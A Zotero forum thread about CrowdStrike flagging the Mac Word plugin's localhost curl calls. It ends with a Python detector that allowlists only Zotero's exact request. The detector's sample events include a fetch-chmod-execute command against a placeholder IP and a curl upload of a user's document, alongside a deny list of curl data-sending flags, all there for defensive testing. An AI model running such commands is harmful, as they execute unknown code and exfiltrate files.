Word for Mac closes when using Zotero 6.0.27 plugin [caused by CrowdStrike antivirus software]
This discussion was created from comments split from: Word (Mac) crashes when adding Footnote (Report ID: 197542060).
Latest update: https://forums.zotero.org/discussion/comment/443522/#Comment_443522
https://forums.zotero.org/discussion/comment/442907/#Comment_442907
Reverting to 6.0.26 did not work. Word 16.76.1. M2 Macbook Air on 13.4.1 but it happened on an older OS version too.
Can't replicate this on an Intel Mac on 13.5.1
Thanks for the quick fix!
…and while we've temporarily pulled 6.0.27 due to this problem with CrowdStrike, we do need to put 6.0.27 back out soon. [Update: This has been fixed by CrowdStrike, as noted below, and we've re-released 6.0.27. If you're still seeing this, ask your IT department to update CrowdStrike to allow this. Staying on 6.0.26 isn't a permanent fix.]
I see you are now using curl to make the HTTP request between the plugin and the Zotero app. It looks like this new method is what is being deemed a risk by various AV products.
I will post the information from our alerts here for context as to why it is being seen as a security risk:
SuspiciousOfficeActivity
Microsoft Office runs a number of software child processes on the regular. This analytic looks for some of the ones used frequently in attacks that do not occur regularly under the Office suite, implying a malicious Office macro may have been executed.
curl (8974)
Process Arguments
curl -s -o /dev/null -I -w %{http_code} -X GET http://127.0.0.1:23119/integration/macWordCommand?agent=MacWord16&command=addEditCitation&document=/Applications/Microsoft Word.app/&templateVersion=2
bash (8973)
Process Arguments
sh -c curl -s -o /dev/null -I -w '%{http_code}' -X GET 'http://127.0.0.1:23119/integration/macWordCommand?agent=MacWord16&command=addEditCitation&document=/Applications/Microsoft Word.app/&templateVersion [26 characters truncated]
We have stopped updating Zotero to this latest version due to these many alerts we receive multiple times per user on version 6.27.
I could create a rule in our AV to exempt these alerts, but this would be for any alerts triggered by the curl command. Not something I feel comfortable doing.
I would suggest maybe revisiting the changes you have made to the way the plugin works. It concerns me that this is the way forward since it appears to be a method used by malware developers and Apple/AV view it as a risk.
Unfortunately we just don't currently have an alternative here. macOS Sonoma makes app-sandboxing changes that prevent the previous Word-to-Zotero communication method from working without triggering a permissions prompt every single time you start Zotero, with no way to allow it permanently. That's just not an acceptable user experience, so communicating via HTTP to localhost is the only option. And we can't detect the macOS version from within Word, so we need to switch to this method for all macOS versions.
You should report this to Jamf. Having default detectors flag an unexpected process call is fine, but they obviously should be able to allow exceptions at a more granular level than the process name. There's nothing dangerous or unusual about using localhost HTTP for IPC.
We're working with Microsoft to improve a new Word API so that we can offer a new, greatly improved version of the plugin, which among other things should eliminate the need for the curl call (though it will still use localhost HTTP). That likely won't be available until next year, though.
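The two posts above disagree on granularity: the admin can only exempt every curl invocation, while the developer argues an exception should be narrower than a process name. The following is an added example written for this thread (not code from Zotero, Jamf or CrowdStrike) of what that narrower exception looks like: a process-tree check that still alerts on Office spawning a shell or curl, but allows exactly the shape seen in the alert above, a read-only request to 127.0.0.1:23119 under /integration/ with the body discarded, and nothing else. The event record layout, the ancestor list and the sample events are constructed for illustration and are not any vendor's schema.

```python
"""Process-tree detector with a narrow Zotero allowlist.

Added example for this thread, not code from Zotero, Jamf or CrowdStrike.
The event shape (pid, ancestors, name, cmdline) and the sample events are
constructed; the localhost address, port 23119 and the /integration/ path
come from the alert entries posted in the thread.
"""
import shlex
from dataclasses import dataclass
from typing import List, Optional, Tuple
from urllib.parse import urlparse

OFFICE_APPS = {"Microsoft Word", "Microsoft Excel", "Microsoft PowerPoint", "Microsoft Outlook"}
SHELLS = {"sh", "bash", "zsh"}
WATCHED_CHILDREN = SHELLS | {"curl", "osascript", "python3", "perl"}

# Zotero's integration endpoint, as seen in the posted alert.
ZOTERO_HOST, ZOTERO_PORT, ZOTERO_PATH = "127.0.0.1", 23119, "/integration/"

# curl options that would turn a status check into an upload, a download to disk,
# a credentialed request or a proxy hop. None appear in the Zotero call, so any of
# them voids the exception even when the URL points at localhost.
CURL_DENY_FLAGS = {"-d", "--data", "--data-binary", "--data-raw", "--data-urlencode",
                   "-F", "--form", "-T", "--upload-file", "-K", "--config",
                   "-x", "--proxy", "-O", "--remote-name", "-u", "--user"}


@dataclass(frozen=True)
class ProcEvent:
    pid: int
    ancestors: Tuple[str, ...]   # nearest parent first (constructed field)
    name: str
    cmdline: str


def curl_argv(cmdline: str) -> Optional[List[str]]:
    """Return curl's argv if the event is curl, exec'd directly or wrapped in `sh -c '...'`."""
    argv = shlex.split(cmdline)
    if len(argv) >= 3 and argv[0] in SHELLS and argv[1] == "-c":
        argv = shlex.split(argv[2])          # unwrap the single-string shell command
    return argv if argv and argv[0] == "curl" else None


def is_zotero_ipc(argv: List[str]) -> bool:
    """True only for a plain request to Zotero's localhost endpoint with the body discarded."""
    urls = [a for a in argv if a.startswith(("http://", "https://"))]
    if len(urls) != 1:
        return False
    u = urlparse(urls[0])
    if (u.scheme, u.hostname, u.port) != ("http", ZOTERO_HOST, ZOTERO_PORT):
        return False
    if not u.path.startswith(ZOTERO_PATH):
        return False
    if any(a in CURL_DENY_FLAGS for a in argv):
        return False
    for i, a in enumerate(argv):             # -o may only discard the body, never write it to disk
        if a in ("-o", "--output") and (i + 1 >= len(argv) or argv[i + 1] != "/dev/null"):
            return False
    return True


def classify(ev: ProcEvent) -> str:
    """Verdict for one process event: ignore, allow (Zotero IPC) or alert."""
    if ev.name not in WATCHED_CHILDREN or not any(a in OFFICE_APPS for a in ev.ancestors):
        return "ignore"
    argv = curl_argv(ev.cmdline)
    if argv is not None and is_zotero_ipc(argv):
        return "allow:zotero-localhost-ipc"
    return "alert:SuspiciousOfficeActivity"


# The curl line from the alert, with the quoting the shell would have seen.
ZOTERO_CURL = ("curl -s -o /dev/null -I -w '%{http_code}' -X GET "
               "'http://127.0.0.1:23119/integration/macWordCommand?agent=MacWord16"
               "&command=addEditCitation&document=/Applications/Microsoft Word.app/&templateVersion=2'")

SAMPLE_EVENTS = [   # constructed; the first two mirror the sh/curl pair in the alert
    ProcEvent(8973, ("Microsoft Word",), "sh", 'sh -c "' + ZOTERO_CURL + '"'),
    ProcEvent(8974, ("sh", "Microsoft Word"), "curl", ZOTERO_CURL),
    ProcEvent(9001, ("Microsoft Word",), "sh",
              'sh -c "curl -s -o /tmp/.u http://192.0.2.10/u && chmod +x /tmp/.u && /tmp/.u"'),
    ProcEvent(9002, ("Microsoft Word",), "curl",
              "curl -s -d @/Users/alice/Documents/contract.docx http://127.0.0.1:23119/integration/upload"),
    ProcEvent(9003, ("Finder",), "curl", "curl -s https://example.com"),
]


def run_demo() -> List[Tuple[int, str]]:
    return [(ev.pid, classify(ev)) for ev in SAMPLE_EVENTS]


if __name__ == "__main__":
    for pid, verdict in run_demo():
        print(pid, verdict)
```

The point of the fourth sample is that "localhost only" is not the exception either: a request to the same host and port that carries a file body (`-d @…`) must still alert, so the allow rule keys on the whole command shape (single URL, loopback host, fixed port and path prefix, no upload/download/proxy flags, output only to /dev/null), not on the process name or the host alone.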